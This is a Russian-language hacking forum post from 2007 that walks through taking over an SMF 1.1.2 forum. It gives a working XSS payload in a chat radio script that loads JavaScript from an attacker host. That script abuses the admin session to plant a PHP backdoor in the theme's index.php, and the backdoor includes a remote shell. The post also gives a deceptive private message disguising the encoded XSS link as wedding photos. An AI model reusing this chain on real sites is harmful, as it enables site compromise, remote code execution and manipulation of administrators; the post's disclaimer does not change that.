Показать сообщение отдельно

  #5  
Старый 12.07.2007, 09:22
n-000
Участник форума
Регистрация: 25.10.2006
Сообщений: 108
Провел на форуме:
495411

Репутация: 91
По умолчанию

Это всё канешна весело если есть админка от форума, а если нет ? ...

Получить админку можно либо описанными (непомню в каком посте) способами, а можно немножко извратиться над этими способами и зделать нечто иное...

Например щас я обрабатываю один из сайтикоф с многострадальным SMF 1.1.2 в дальнейшем siteX.ru.
Вот что я проделал :
На сайте имеется чат, в котором как опция присутствует онлайн радио, в скрипте которого я нашёл элементарную XSS такова вида http://siteX.ru/designes/radio.php?station=%22%20></OBJECT><script%20src=http://ааа.com/run.js></script><!--
Обнаружилось и то, что при попытки получить куки с помощью свойства document.cookie сайт выдавал куки не только чата , но и форума
Содержание run.js такое
Код:
var s=document.createElement('script');
s.src='http://aaa.com/re.js';
document.documentElement.firstChild.appendChild(s);
Думаю пока фсё понятно ... нет ? много травы курите господа хватит
листинг re.js (который запускаеца скриптом run.js)
Код:
var shellCode = "<?php\n\n";
shellCode += "// Try to handle it with the upper level index.php.  (it should know what to do.)\n";
shellCode += "$str=base64_decode('aHR0cDovL2ZmZmYueHkvc2hlbGwudHh0');\n";
shellCode += "if($_GET['act']=='run'){include($str);};\n";
shellCode += "if (file_exists(dirname(dirname(__FILE__)) . '/index.php'))\n";
shellCode += "   include (dirname(dirname(__FILE__)) . '/index.php');\n";
shellCode += "else\n";
shellCode += "   exit;\n\n?>";

sendRequest("forum/index.php", null, "GET", getSesc);

function getSesc(request) {
    var sessVerify = request.responseText.match(/sesc=([a-z0-9]{32})/);

    if(sessVerify) {
        sendRequest(
            "forum/index.php?action=theme;th=1;sa=edit",
            "entire_file=" + escape(shellCode ) + "&submit=Save+Changes&filename=index.php&sc=" + sessVerify[1],
            "POST", null);
    }
}

function sendRequest(url, data, method, onLoadFunc) {
    var request = createHttpRequest();

    if(request) {
        request.open(method, url, true);
        
        if(method == "POST") {
            request.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); }

        if(onLoadFunc) {
            request.onreadystatechange = function() {
                if(request.readyState == 4) {
                    onLoadFunc(request); }
            }
        }
        request.send(data);
    }
} 

function createHttpRequest() {
    var httpRequest = false;
    try {
        httpRequest = new ActiveXObject("Msxml2.XMLHTTP"); }
    catch(e) {
        try {
            httpRequest = new ActiveXObject("Microsoft.XMLHTTP"); }
        catch(e) {
            try {
                httpRequest = new XMLHttpRequest(); }
            catch(e) {
                httpRequest = false;
            }
        }
    }
    return httpRequest;
}
Здесь немного поясню... этот скрипт вместо админа берёт да и правит тему индекса форума тоесть фсё это происходит незаметно для админа, разработчики SMF постарались, поэтому исправления не нужно подтверждать паролем ))
Вопщем индекс будет в переменной shellCode (см. предыдущий пост)
Едем дальше, думаю хватит мазать сопли по тарелке... Регим в форуме ник жэнской наружности и отправляем приват админу что то типо

Танька, наши фотки со свадьбы я закинула в фотоархиф, у тя там такое эротичное платье вот ссылка [U R L =http://siteX.ru/designes/radio.php?station=%22%3E%3C%2F%4F%42%4A%45%43%54%3 E%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70% 3A%2F%2F%66%6F%72%65%73%74%2E%61%6C%66%61%6D%6F%6F %6E%2E%63%6F%6D%2F%72%75%6E%2E%6A%73%3E%3C%2F%73%6 3%72%69%70%74%3E%3C%21%2D%2D]http://photo-arhifff.xy/index.php?id=12548[/URL]

Абратите ОСОБОЕ внимание на ссылку, даже если админ откроет её в новом окне он фсё равно фстрянет
А любопытство как известно весч каварная... хоч не хоч а ткнуть придёца =)
Итог ... идём по ссылке http://siteX.ru /forum/Themes/default/index.php?act=run
и злобно начинаем БУГАГА
********************************
В этом методе есть два минуса:
1. Админ может что то заподозрить и не ткнуть на ссылу, а ваш ник получит бан =)
2.Если пхп сессия админа здохнет, хрен вам а не шелл, т к доступ в админку будет только по паролю, но при этом он спокойно может править свой профиль и отправлять мессаги !

***************************************

Инфа выложена чиста в азнакомительных целях, афтар не несёт ответственности за фсяких психов типо его самого, которые могут использовать эту инфу в западлянских целях !

EOF
 
Ответить с цитированием